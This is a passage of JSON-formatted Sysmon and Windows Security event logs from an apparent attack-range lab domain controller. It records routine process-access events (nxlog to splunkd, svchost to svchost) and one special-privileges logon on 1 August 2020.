C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:37.516","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4644,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:38.516\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:38.516","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4645,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.516\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.516","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220433,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x661A5\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x661a5","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4646,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4647,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4648,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4649,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.735\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.735","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
